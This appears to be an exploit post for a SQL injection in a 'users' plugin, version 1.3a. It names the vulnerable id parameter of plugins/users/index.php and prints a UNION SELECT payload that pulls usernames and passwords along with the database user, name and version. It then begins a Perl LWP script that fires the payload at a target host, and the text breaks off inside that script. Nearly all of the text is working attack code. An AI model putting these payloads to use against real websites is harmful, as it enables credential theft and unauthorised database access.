[*] SQL (plugin users) 1.3a
[ ] plugins/users/index.php?id= [Code SQL]
[ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1--
[*] Exploit:
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
my $host = shift;
my ($start,$content,@login);
my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1--";
if($host =~ /^http:\/\/?/i)
{
$start = new LWP::UserAgent or die "[ ] Unable to connect\n";
$start->timeout(1);
$start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
$content = $start->get($host.$evilxx);
